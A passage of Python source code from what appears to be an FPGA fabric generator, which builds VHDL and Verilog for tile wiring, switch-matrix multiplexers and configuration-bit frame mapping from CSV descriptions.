TileInputSignal.append('Tile_X'+str(x)+'Y'+str(y-1)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# WEST direction: get the WiBEG wires from tile x+1, because they drive WiEND
if x < (x_tiles-1):
if (fabric[y][x+1]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x+1])+'_tile.vhdl', filter='WEST')
for port in TileOutputs:
TileInputSignal.append('Tile_X'+str(x+1)+'Y'+str(y)+'_'+port)
if TileOutputs == []:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(len(TileOutputs))
else:
TileInputSignalCountPerDirection.append(0)
else:
TileInputSignalCountPerDirection.append(0)
# at this point, TileInputSignal is carrying all the driver signals from the surrounding tiles (the BEG signals of those tiles)
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y3_N1BEG( 3 downto 0 )"
# for element in TileInputSignal:
# print('DEBUG TileInputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
# the output signals are named after the output ports
TileOutputSignal = []
TileInputsCountPerDirection = []
# as for the VHDL signal generation, we simply add a prefix like "Tile_X1Y0_" to the begin port
# for port in TileOutputs:
# TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
if (fabric[y][x]) != 'NULL':
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='NORTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='EAST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='SOUTH')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl', filter='WEST')
for port in TileOutputs:
TileOutputSignal.append('Tile_X'+str(x)+'Y'+str(y)+'_'+port)
TileInputsCountPerDirection.append(len(TileInputs))
# at this point, TileOutputSignal is carrying all the signal names that will be driven by the present tile
# for example when we are on Tile_X2Y2, the first entry could be "Tile_X2Y2_W1BEG( 3 downto 0 )"
# for element in TileOutputSignal:
# print('DEBUG TileOutputSignal :'+'Tile_X'+str(x)+'Y'+str(y), element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
TileInputs, TileOutputs = GetComponentPortsFromFile(str(fabric[y][x])+'_tile.vhdl')
# example: W6END( 11 downto 0 ), N1BEG( 3 downto 0 ), ...
# meaning: the END-ports are the tile inputs followed by the actual tile output ports (typically BEG)
# this is essentially the left side (the component ports) of the component instantiation
CheckFailed = False
# sanity check: The number of input ports has to match the TileInputSignal per direction (N,E,S,W)
if (fabric[y][x]) != 'NULL':
for k in range(0,4):
if TileInputsCountPerDirection[k] != TileInputSignalCountPerDirection[k]:
print('ERROR: component input missmatch in '+str(All_Directions[k])+' direction for Tile_X'+str(x)+'Y'+str(y)+' of type '+str(fabric[y][x]))
CheckFailed = True
if CheckFailed == True:
print('Error in function GenerateFabricVHDL')
print('DEBUG:TileInputs: ',TileInputs)
print('DEBUG:TileInputSignal: ',TileInputSignal)
print('DEBUG:TileOutputs: ',TileOutputs)
print('DEBUG:TileOutputSignal: ',TileOutputSignal)
# raise ValueError('Error in function GenerateFabricVHDL')
# the output ports are derived from the same list and should therefore match automatically
# for element in (TileInputs+TileOutputs):
# print('DEBUG TileInputs+TileOutputs :'+'Tile_X'+str(x)+'Y'+str(y)+'element:', element)
if (fabric[y][x]) != 'NULL': # looks like this conditional is redundant
for k in range(0,len(TileInputs)):
PortName = re.sub('\(.*', '', TileInputs[k])
print('\t'+PortName+'\t=> '+TileInputSignal[k]+',',file=file)
# print('DEBUG_INPUT: '+PortName+'\t=> '+TileInputSignal[k]+',')
for k in range(0,len(TileOutputs)):
PortName = re.sub('\(.*', '', TileOutputs[k])
print('\t'+PortName+'\t=> '+TileOutputSignal[k]+',',file=file)
# print('DEBUG_OUTPUT: '+PortName+'\t=> '+TileOutputSignal[k]+',')
# Check if this tile uses IO-pins that have to be connected to the top-level entity
CurrentTileExternalPorts = GetComponentPortsFromFile(fabric[y][x]+'_tile.vhdl', port='external')
if CurrentTileExternalPorts != []:
print('\t -- tile IO port which gets directly connected to top-level tile entity', file=file)
for item in CurrentTileExternalPorts:
# we need the PortName and the PortDefinition (everything after the ':' separately
PortName = re.sub('\:.*', '', item)
substitutions = {" ": "", "\t": ""}
PortName=(replace(PortName, substitutions))
PortDefinition = re.sub('^.*\:', '', item)
# ExternalPorts was populated when writing the fabric top level entity
print('\t\t'+PortName+' => ',ExternalPorts[ExternalPorts_counter],',', file=file)
ExternalPorts_counter += 1
if ConfigBitMode == 'FlipFlopChain':
GenerateVHDL_Conf_Instantiation(file=file, counter=tile_counter, close=True)
if ConfigBitMode == 'frame_based':
if (fabric[y][x]) != 'NULL':
TileConfigBits = GetNoConfigBitsFromFile(str(fabric[y][x])+'_tile.vhdl')
if TileConfigBits != 'NULL':
if int(TileConfigBits) == 0:
# print('\t\t ConfigBits => (others => \'-\') );\n', file=file)
# the next one is fixing the fact the the last port assignment in vhdl is not allowed to have a ','
# this is a bit ugly, but well, vhdl is ugly too...
last_pos = file.tell()
for k in range(20):
file.seek(last_pos -k) # scan character by character backwards and look for ','
my_char = file.read(1)
if my_char == ',':
file.seek(last_pos -k) # place seek pointer to last ',' position and overwrite with a space
print(' ', end='', file=file)
break # stop scan
file.seek(0, os.SEEK_END) # go back to usual...
print('\t\t );\n', file=file)
else:
print('\t\tFrameData \t =>\t '+'Tile_Y'+str(y)+'_FrameData, ' , file=file)
print('\t\tFrameStrobe \t =>\t '+'Tile_X'+str(x)+'_FrameStrobe ); \n' , file=file)
#print('\t\t ConfigBits => ConfigBits ( '+str(TileConfigBits)+' -1 downto '+str(0)+' ) );\n', file=file)
### BEL_ConfigBitsCounter = BEL_ConfigBitsCounter + int(BEL_ConfigBits)
tile_counter += 1
print('\n'+'end Behavioral;'+'\n', file=file)
return
def CSV2list( InFileName, OutFileName ):
# this function is export a given CSV switch matrix description into its equivalent list description
# format: destination,source (per line)
# read CSV file into an array of strings
InFile = [i.strip('\n').split(',') for i in open(InFileName)]
f=open(OutFileName,'w')
rows=len(InFile) # get the number of tiles in vertical direction
cols=len(InFile[0]) # get the number of tiles in horizontal direction
# top-left should be the name
print('#',InFile[0][0], file=f)
# switch matrix inputs
inputs = []
for item in InFile[0][1:]:
inputs.append(item)
# beginning from the second line, write out the list
for line in InFile[1:]:
for i in range(1,cols):
if line[i] != '0':
print(line[0]+','+inputs[i-1], file=f) # it is [i-1] because the beginning of the line is the destination port
f.close()
return
def takes_list(a_string, a_list):
print('first debug (a_list):',a_list, 'string:', a_string)
for item in a_list:
print('hello debug:',item, 'string:', a_string)
def ExpandListPorts(port, PortList):
# a leading '[' tells us that we have to expand the list
if re.search('\[', port):
if not re.search('\]', port):
raise ValueError('\nError in function ExpandListPorts: cannot find closing ]\n')
# port.find gives us the first occurrence index in a string
left_index = port.find('[')
right_index = port.find(']')
before_left_index = port[0:left_index]
# right_index is the position of the ']' so we need everything after that
after_right_index = port[(right_index+1):]
ExpandList = []
ExpandList = re.split('\|',port[left_index+1:right_index])
for entry in ExpandList:
ExpandListItem = (before_left_index+entry+after_right_index)
ExpandListPorts(ExpandListItem, PortList)
else:
# print('DEBUG: else, just:',port)
PortList.append(port)
return
def list2CSV( InFileName, OutFileName ):
# this sets connections ('1') in a CSV connection matrix (OutFileName) from a list (InFileName)
# read input files into arrays of strings
InFile = [i.strip('\n').split(',') for i in open(InFileName)]
OutFile = [i.strip('\n').split(',') for i in open(OutFileName)]
#get OutFile input ports
OutFileInputPorts = []
for k in range(1,len(OutFile[0])):
OutFileInputPorts.append(OutFile[0][k])
#get OutFile output ports
OutFileOutputPorts = []
for k in range(1,len(OutFile)):
OutFileOutputPorts.append(OutFile[k][0])
# clean up InFile (the list) and remove empty lines and comments
InList = []
InFileInputPorts = []
InFileOutputPorts = []
for line in InFile:
items=len(line)
if items >= 2:
if line[0] != '' and not re.search('#', line[0], flags=re.IGNORECASE):
substitutions = {" ": "", "\t": ""}
# multiplexer output
LeftItem = replace(line[0], substitutions)
# multiplexer input
RightItem = replace(re.sub('#.*','' ,line[1]), substitutions)
if RightItem != '':
InList.append([LeftItem, RightItem])
# InFileInputPorts.append(RightItem)
# InFileOutputPorts.append(LeftItem)
ExpandListPorts(RightItem, InFileInputPorts)
ExpandListPorts(LeftItem, InFileOutputPorts)
UniqInFileInputPorts = list(set(InFileInputPorts))
UniqInFileOutputPorts = list(set(InFileOutputPorts))
# sanity check: if all used ports in InFile are in the CSV table
# which means all ports of UniqInFileInputPorts must exist in OutFileInputPorts
for port in UniqInFileInputPorts:
if port not in OutFileInputPorts:
print('\nError: input file list uses an input port', port, ' that does not exist in the CSV table\n')
# raise ValueError('\nError: input file list uses an input port that does not exist in the CSV table\n')
# ... and that all ports of UniqInFileOutputPorts must exist in OutFileOutputPorts
for port in UniqInFileOutputPorts:
if port not in OutFileOutputPorts:
print('\nError: input file list uses an output port', port, ' that does not exist in the CSV table\n')
# raise ValueError('\nError: input file list uses an output port that does not exist in the CSV table\n')
# process the InList
for line in InList:
# OutFileOutputPorts : switch matrix output port list (from CSV file)
# line[0] : switch matrix output port;
# line[1] : switch matrix input port
# we have to add a +1 on the index because of the port name lists in the first row/column
LeftPortList = []
RightPortList = []
ExpandListPorts(line[0], LeftPortList)
ExpandListPorts(line[1], RightPortList)
if len(LeftPortList) != len(RightPortList):
raise ValueError('\nError in function list2CSV: left argument:\n',line[0], '\n does not match right argument:\n', line[1])
for k in range(len(LeftPortList)):
MuxOutputIndex = OutFileOutputPorts.index(LeftPortList[k]) + 1
MuxInputIndex = OutFileInputPorts.index(RightPortList[k]) + 1
if OutFile[MuxOutputIndex][MuxInputIndex] != '0':
print('Warning: following connection exists already in CSV switch matrix: ', end='')
print(OutFileOutputPorts[MuxOutputIndex-1]+','+OutFileInputPorts[MuxInputIndex-1])
# set the connection in the adjacency matrix
OutFile[MuxOutputIndex][MuxInputIndex] = '1'
# When we parse in the CSV file, we filter out comments, starting with '#'
# so we can use this to count the number of '1' in rows (= size of multiplexers) and columns (= fan out)
# this provides some useful statistics without affecting the operation of the tool
# row scan
OutFileAnnotated = []
for line in OutFile:
Counter = 0
for item in line[1:]:
if item == '1':
Counter += 1
new_line = line
new_line.append('#')
new_line.append(str(Counter))
OutFileAnnotated.append(new_line)
# column scan
new_line = []
new_line.append('#')
for x in range(1,len(OutFile[0])):
Counter = 0
for y in range(1,len(OutFile)):
if OutFile[y][x] == '1': # column-by-column scan
Counter += 1
new_line.append(str(Counter))
OutFileAnnotated.append(new_line)
# finally overwrite switch matrix CSV file
# tmp = numpy.asarray(OutFile)
# numpy.savetxt(OutFileName, tmp, fmt='%s', delimiter=",")
tmp = numpy.asarray(OutFileAnnotated)
numpy.savetxt(OutFileName, tmp, fmt='%s', delimiter=",")
return
def GenTileSwitchMatrixVerilog( tile, CSV_FileName, file ):
print('### Read '+str(tile)+' csv file ###')
CSVFile = [i.strip('\n').split(',') for i in open(CSV_FileName)]
# clean comments empty lines etc. in the mapping file
CSVFile = RemoveComments(CSVFile)
# sanity check if we have the right CSV file
if tile != CSVFile[0][0]:
raise ValueError('top left element in CSV file does not match tile type in function GenTileSwitchMatrixVerilog')
# we check if all columns contain at least one entry
# basically that a wire entering the switch matrix can also leave that switch matrix.
# When generating the actual multiplexers, we run the same test on the rows...
for x in range(1,len(CSVFile[0])):
ColBitCounter = 0
for y in range(1,len(CSVFile)):
if CSVFile[y][x] == '1':# column-by-column scan
ColBitCounter += 1
if ColBitCounter == 0:# if we never counted, it may point to a problem
print('WARNING: input port '+CSVFile[0][x]+' of switch matrix in Tile '+CSVFile[0][0]+' is not used (from function GenTileSwitchMatrixVerilog)')
# we pass the NumberOfConfigBits as a comment in the beginning of the file.
# This simplifies it to generate the configuration port only if needed later when building the fabric where we are only working with the Verilog files
GlobalConfigBitsCounter = 0
mux_size_list = []
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
mux_size_list.append(mux_size)
if mux_size >= 2:
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('//NumberOfConfigBits:'+str(GlobalConfigBitsCounter), file=file)
# Verilog header
module = tile+'_switch_matrix'
module_header_ports = ''
ports = []
for port in CSVFile[0][1:]:
# the following conditional is used to capture GND and VDD to not sow up in the switch matrix port list
if re.search('^GND', port, flags=re.IGNORECASE) or re.search('^VCC', port, flags=re.IGNORECASE) or re.search('^VDD', port, flags=re.IGNORECASE):
pass # maybe needed one day
else:
ports.append(port)
# output ports
for line in CSVFile[1:]:
ports.append(line[0])
module_header_ports = ", ".join(ports)
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'FlipFlopChain':
module_header_ports += ', MODE, CONFin, CONFout, CLK'
elif ConfigBitMode == 'frame_based':
module_header_ports += ', ConfigBits'
else:
module_header_ports += ''
if (ConfigBitMode == 'FlipFlopChain'):
GenerateVerilog_Header(module_header_ports, file, module, package=Package, NoConfigBits=str(GlobalConfigBitsCounter))
else:
GenerateVerilog_Header(module_header_ports, file, module, package='', NoConfigBits=str(GlobalConfigBitsCounter))
# input ports
print('\t // switch matrix inputs', file=file)
# CSVFile[0][1:]: starts in the first row from the second element
for port in CSVFile[0][1:]:
# the following conditional is used to capture GND and VDD to not sow up in the switch matrix port list
if re.search('^GND', port, flags=re.IGNORECASE) or re.search('^VCC', port, flags=re.IGNORECASE) or re.search('^VDD', port, flags=re.IGNORECASE):
pass # maybe needed one day
else:
print('\tinput '+port+';', file=file)
# output ports
for line in CSVFile[1:]:
print('\toutput '+line[0]+';', file=file)
# this is a shared text block finishes the header and adds configuration port
if GlobalConfigBitsCounter > 0:
GenerateVerilog_PortsFooter(file, module, ConfigPort=True)
else:
GenerateVerilog_PortsFooter(file, module, ConfigPort=False)
# parameter declaration
# we may use the following in the switch matrix for providing '0' and '1' to a mux input:
print('\tparameter GND0 = 1\'b0;', file=file)
print('\tparameter GND = 1\'b0;', file=file)
print('\tparameter VCC0 = 1\'b1;', file=file)
print('\tparameter VCC = 1\'b1;', file=file)
print('\tparameter VDD0 = 1\'b1;', file=file)
print('\tparameter VDD = 1\'b1;', file=file)
print('\t', file=file)
# signal declaration
for k in range(1,len(CSVFile),1):
print('\twire ['+str(mux_size_list[k-1]),'-1:0]'+CSVFile[k][0]+'_input'+';', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
print('', file=file)
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
print('\twire ['+str(int(math.ceil(math.log2(mux_size))))+'-1:0] '+'DEBUG_select_'+str(line[0])+';', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# print('debug', file=file)
#
# mux_size_list = []
# ConfigBitsCounter = 0
# for line in CSVFile[1:]:
# # we first count the number of multiplexer inputs
# mux_size=0
# for port in line[1:]:
# # print('debug: ',port)
# if port != '0':
# mux_size += 1
# mux_size_list.append(mux_size)
# if mux_size >= 2:
# print('signal \t ',line[0]+'_input','\t:\t std_logic_vector(',str(mux_size),'- 1 downto 0 );', file=file)
# # "mux_size" tells us the number of mux inputs and "int(math.ceil(math.log2(mux_size)))" the number of configuration bits
# # we count all bits needed to declare a corresponding shift register
# ConfigBitsCounter = ConfigBitsCounter + int(math.ceil(math.log2(mux_size)))
print('\n// The configuration bits (if any) are just a long shift register', file=file)
print('\n// This shift register is padded to an even number of flops/latches', file=file)
# we are only generate configuration bits, if we really need configurations bits
# for example in terminating switch matrices at the fabric borders, we may just change direction without any switching
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print('\twire ['+str(GlobalConfigBitsCounter)+'-1:0]'+' ConfigBits;', file=file)
elif ConfigBitMode == 'FlipFlopChain':
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
# we pad to an even number of bits: (int(math.ceil(ConfigBitCounter/2.0))*2)
print('\twire ['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1:0]'+' ConfigBits;', file=file)
print('\twire ['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1:0]'+' ConfigBitsInput;', file=file)
# the configuration bits shift register
# again, we add this only if needed
if GlobalConfigBitsCounter > 0:
if ConfigBitMode == 'ff_chain':
print('// the configuration bits shift register' , file=file)
print('\t'+'always @ (posedge CLK)', file=file)
print('\t'+'begin', file=file)
print('\t'+'\t'+'if (MODE=1b\'1) begin //configuration mode' , file=file)
print('\t'+'\t'+'\t'+'ConfigBits <= {CONFin,ConfigBits['+str(GlobalConfigBitsCounter)+'-1:1]};' , file=file)
print('\t'+'\t'+'end' , file=file)
print('\t'+'end', file=file)
print('', file=file)
print('\tassign CONFout = ConfigBits['+str(GlobalConfigBitsCounter)+'-1];', file=file)
print('\n', file=file)
# L:for k in 0 to 196 generate
# inst_LHQD1a : LHQD1
# Port Map(
# D => ConfigBitsInput(k*2),
# E => CLK,
# Q => ConfigBits(k*2) ) ;
# inst_LHQD1b : LHQD1
# Port Map(
# D => ConfigBitsInput((k*2)+1),
# E => MODE,
# Q => ConfigBits((k*2)+1) );
# end generate;
elif ConfigBitMode == 'FlipFlopChain':
print('\tgenvar k;\n', file=file)
# print('DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG DEBUG ConfigBitMode == FlipFlopChain')
print('\tassign ConfigBitsInput = {ConfigBits['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1-1:0],CONFin};\n', file=file)
print('\t// for k in 0 to Conf/2 generate', file=file)
print('\tfor (k=0; k<'+str(int(math.ceil(GlobalConfigBitsCounter/2.0))-1)+'; k=k+1) begin: L', file=file)
print('\t\t'+'LHQD1 inst_LHQD1a(', file=file)
print('\t\t'+'.D(ConfigBitsInput[k*2]),', file=file)
print('\t\t'+'.E(CLK),', file=file)
print('\t\t'+'.Q(ConfigBits[k*2])', file=file)
print('\t\t);', file=file)
print('', file=file)
print('\t\t'+'LHQD1 inst_LHQD1b(', file=file)
print('\t\t'+'.D(ConfigBitsInput[(k*2)+1]),', file=file)
print('\t\t'+'.E(MODE),', file=file)
print('\t\t'+'.Q(ConfigBits[(k*2)+1])', file=file)
print('\t\t);', file=file)
print('\tend\n', file=file)
print('\tassign CONFout = ConfigBits['+str(int(math.ceil(GlobalConfigBitsCounter/2.0))*2)+'-1];', file=file)
print('\n', file=file)
# the switch matrix implementation
# we use the following variable to count the configuration bits of a long shift register which actually holds the switch matrix configuration
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
# print('debug: ',port)
if port != '0':
mux_size += 1
print('// switch matrix multiplexer ',line[0],'\t\tMUX-'+str(mux_size), file=file)
if mux_size == 0:
print('// WARNING unused multiplexer MUX-'+str(line[0]), file=file)
print('WARNING: unused multiplexer MUX-'+str(line[0])+' in tile '+str(CSVFile[0][0]))
# just route through : can be used for auxiliary wires or diagonal routing (Manhattan, just go to a switch matrix when turning
# can also be used to tap a wire. A double with a mid is nothing else as a single cascaded with another single where the second single has only one '1' to cascade from the first single
if mux_size == 1:
port_index = 0
for port in line[1:]:
port_index += 1
if port == '1':
print('\tassign '+line[0]+' = '+CSVFile[0][port_index]+';', file=file)
elif port == 'l' or port == 'L' :
print('\tassign '+line[0],' = 1b\'0;', file=file)
elif port == 'h' or port == 'H':
print('\tassign '+line[0],' = 1b\'1;', file=file)
elif port == '0':
pass # we add this for the following test to throw an error is an unexpected character is used
else:
raise ValueError('wrong symbol in CSV file (must be 0, 1, H, or L) when executing function GenTileSwitchMatrixVerilog')
# this is the case for a configurable switch matrix multiplexer
if mux_size >= 2:
if int(GenerateDelayInSwitchMatrix) > 0:
#print('\tassign #'+str(GenerateDelayInSwitchMatrix)+' '+line[0]+'_input'+' = {', end='', file=file)
print('\tassign '+line[0]+'_input'+' = {', end='', file=file)
else:
print('\tassign '+line[0]+'_input'+' = {', end='', file=file)
port_index = 0
inputs_so_far = 0
# the reversed() changes the direction that we iterate over the line list.
# I changed it such that the left-most entry is located at the end of the concatenated vector for the multiplexing
# This was done such that the index from left-to-right in the adjacency matrix corresponds with the multiplexer select input (index)
# remove "len(line)-" if you remove the reversed(..)
for port in reversed(line[1:]):
port_index += 1
if port != '0':
inputs_so_far += 1
print(CSVFile[0][len(line)-port_index],end='', file=file)
# again the "len(line)-" is needed as we iterate in reverse direction over the line list.
# remove "len(line)-" if you remove the reversed(..)
if inputs_so_far == mux_size:
print('};', file=file)
else:
print(',',end='', file=file)
# int(math.ceil(math.log2(inputs_so_far))) tells us how many configuration bits a multiplexer takes
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(inputs_so_far)))
# we have full custom MUX-4 and MUX-16 for which we have to generate code like:
# Verilog example custom MUX4
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
# Port Map(
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1),
# IN3 => J_l_AB_BEG1_input(2),
# IN4 => J_l_AB_BEG1_input(3),
# S1 => ConfigBits(low_362),
# S2 => ConfigBits(low_362 + 1,
# O => J_l_AB_BEG1 );
# CUSTOM Multiplexers for switch matrix
# CUSTOM Multiplexers for switch matrix
# CUSTOM Multiplexers for switch matrix
if (MultiplexerStyle == 'custom') and (mux_size == 4):
MuxComponentName = 'MUX4PTv4'
if (MultiplexerStyle == 'custom') and (mux_size == 16):
MuxComponentName = 'MUX16PTv2'
if (MultiplexerStyle == 'custom') and (mux_size == 4 or mux_size == 16):
# inst_MUX4PTv4_J_l_AB_BEG1 : MUX4PTv4
print('\t'+MuxComponentName+' inst_'+MuxComponentName+'_'+line[0]+' ('+'\n',end='', file=file)
# Port Map(
# IN1 => J_l_AB_BEG1_input(0),
# IN2 => J_l_AB_BEG1_input(1), ...
for k in range(0,mux_size):
print('\t'+'.IN'+str(k+1)+' ('+line[0]+'_input['+str(k)+']),\n',end='', file=file)
# S1 => ConfigBits(low_362),
# S2 => ConfigBits(low_362 + 1, ...
for k in range(0,(math.ceil(math.log2(mux_size)))):
print('\t'+'.S'+str(k+1)+' (ConfigBits['+str(old_ConfigBitstreamPosition)+'+'+str(k)+']),\n',end='', file=file)
print('\t'+'.O ('+line[0]+')\n',end='', file=file)
print('\t);\n', file=file)
else: # generic multiplexer
if MultiplexerStyle == 'custom':
print('HINT: creating a MUX-'+str(mux_size)+' for port '+line[0]+' in switch matrix for tile '+CSVFile[0][0])
# Verilog example arbitrary mux
# J_l_AB_BEG1 <= J_l_AB_BEG1_input(TO_INTEGER(ConfigBits(363 downto 362)));
print('\tassign '+line[0]+' = '+line[0]+'_input[',end='', file=file)
print('ConfigBits['+str(ConfigBitstreamPosition-1)+':'+str(old_ConfigBitstreamPosition)+']];', file=file)
print(' ', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
if SwitchMatrixDebugSignals == True:
ConfigBitstreamPosition = 0
for line in CSVFile[1:]:
# we first count the number of multiplexer inputs
mux_size=0
for port in line[1:]:
if port != '0':
mux_size += 1
if mux_size >= 2:
old_ConfigBitstreamPosition = ConfigBitstreamPosition
ConfigBitstreamPosition = ConfigBitstreamPosition + int(math.ceil(math.log2(mux_size)))
print('\tassign DEBUG_select_'+line[0]+' = ConfigBits['+str(ConfigBitstreamPosition-1)+':'+str(old_ConfigBitstreamPosition)+'];', file=file)
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
### SwitchMatrixDebugSignals ### SwitchMatrixDebugSignals ###
# just the final end of architecture
print('\n'+'endmodule', file=file)
return
def GenerateConfigMemVerilog( tile_description, module, file ):
# count total number of configuration bits for tile
GlobalConfigBitsCounter = 0
for line in tile_description:
if (line[0] == 'BEL') or (line[0] == 'MATRIX'):
if (GetNoConfigBitsFromFile(line[VHDL_file_position])) != 'NULL':
GlobalConfigBitsCounter = GlobalConfigBitsCounter + int(GetNoConfigBitsFromFile(line[VHDL_file_position]))
# we use a file to describe the exact configuration bits to frame mapping
# the following command generates an init file with a simple enumerated default mapping (e.g. 'LUT4AB_ConfigMem.init.csv')
# if we run this function again, but have such a file (without the .init), then that mapping will be used
MappingFile = GenerateConfigMemInit( tile_description, module, file, GlobalConfigBitsCounter )
# test if we have a bitstream mapping file
# if not, we will take the default, which was passed on from GenerateConfigMemInit
if os.path.exists(module+'.csv'):
print('# found bitstream mapping file '+module+'.csv'+' for tile '+tile_description[0][0])
MappingFile = [i.strip('\n').split(',') for i in open(module+'.csv')]
# clean comments empty lines etc. in the mapping file
MappingFile = RemoveComments(MappingFile)
# clean the '_' symbols in the used_bits_mask field (had been introduced to allow for making that a little more readable
for line in MappingFile:
# TODO does not like white spaces tabs etc
# print('DEBUG BEFORE line[used_bits_mask]:',module ,line[frame_name] ,line[used_bits_mask])
line[used_bits_mask] = re.sub('_', '', line[used_bits_mask])
# print('DEBUG AFTER line[used_bits_mask]:',module ,line[frame_name] ,line[used_bits_mask])
# we should have as many lines as we have frames (=MaxFramesPerCol)
if str(len(MappingFile)) != str(MaxFramesPerCol):
print('WARNING: the bitstream mapping file has only '+str(len(MappingFile))+' entries but MaxFramesPerCol is '+str(MaxFramesPerCol))
# we should have as many lines as we have frames (=MaxFramesPerCol)
# we also check used_bits_mask (is a vector that is as long as a frame and contains a '1' for a bit used and a '0' if not used (padded)
UsedBitsCounter = 0
for line in MappingFile:
if line[used_bits_mask].count('1') > FrameBitsPerRow:
raise ValueError('bitstream mapping file '+module+'.csv has to many 1-elements in bitmask for frame : '+line[frame_name])
if (line[used_bits_mask].count('1') + line[used_bits_mask].count('0')) != FrameBitsPerRow:
# print('DEBUG LINE: ', line)
raise ValueError('bitstream mapping file '+module+'.csv has a too long or short bitmask for frame : '+line[frame_name])
# we also count the used bits over all frames
UsedBitsCounter += line[used_bits_mask].count('1')
if UsedBitsCounter != GlobalConfigBitsCounter:
raise ValueError('bitstream mapping file '+module+'.csv has a bitmask missmatch; bitmask has in total '+str(UsedBitsCounter)+' 1-values for '+str(GlobalConfigBitsCounter)+' bits')
# write module
module_header_ports = 'FrameData, FrameStrobe, ConfigBits'
CSVFile = ''
GenerateVerilog_Header(module_header_ports, file, module, package='', NoConfigBits=str(GlobalConfigBitsCounter), MaxFramesPerCol=str(MaxFramesPerCol), FrameBitsPerRow=str(FrameBitsPerRow))
# the port definitions are generic
print('\tinput [FrameBitsPerRow-1:0] FrameData;', file=file)
print('\tinput [MaxFramesPerCol-1:0] FrameStrobe;', file=file)
print('\toutput [NoConfigBits-1:0] ConfigBits;', file=file)
# one_line('frame_name')('frame_index')('bits_used_in_frame')('used_bits_mask')('ConfigBits_ranges')
# frame signal declaration ONLY for the bits actually used
UsedFrames = [] # keeps track about the frames that are actually used
AllConfigBitsOrder = [] # stores a list of ConfigBits indices in exactly the order defined in the rage statements in the frames
for line in MappingFile:
bits_used_in_frame = line[used_bits_mask].count('1')
if bits_used_in_frame > 0:
print('\twire ['+str(bits_used_in_frame)+'-1:0] '+line[frame_name]+';', file=file)
UsedFrames.append(line[frame_index])
# The actual ConfigBits are given as address ranges starting at position ConfigBits_ranges
ConfigBitsOrder = []
for RangeItem in line[ConfigBits_ranges:]:
if ':' in RangeItem: # we have a range
left, right = re.split(':',RangeItem)
left = int(left)
right = int(right)
if left < right:
step = 1
else:
step = -1
right += step # this makes the python range inclusive, otherwise the last item (which is actually right) would be missing
for k in range(left,right,step):
if k in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(k)+' already allocated in ', module, line[frame_name])
else:
ConfigBitsOrder.append(int(k))
elif RangeItem.isdigit():
if int(RangeItem) in ConfigBitsOrder:
raise ValueError('Configuration bit index '+str(RangeItem)+' already allocated in ', module, line[frame_name])
else:
ConfigBitsOrder.append(int(RangeItem))
else:
# raise ValueError('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('Range '+str(RangeItem)+' cannot be resolved for frame : '+line[frame_name])
print('DEBUG:',line)
if len(ConfigBitsOrder) != bits_used_in_frame:
raise ValueError('ConfigBitsOrder definition misssmatch: number of 1s in mask do not match ConfigBits_ranges for frame : '+line[frame_name])
AllConfigBitsOrder += ConfigBitsOrder
# instantiate latches for only the used frame bits
print('\n//instantiate frame latches' , file=file)
AllConfigBitsCounter = 0
for frame in UsedFrames:
used_bits = MappingFile[int(frame)][int(used_bits_mask)]
# print('DEBUG: ',module, used_bits,' : ',AllConfigBitsOrder)
for k in range(FrameBitsPerRow):
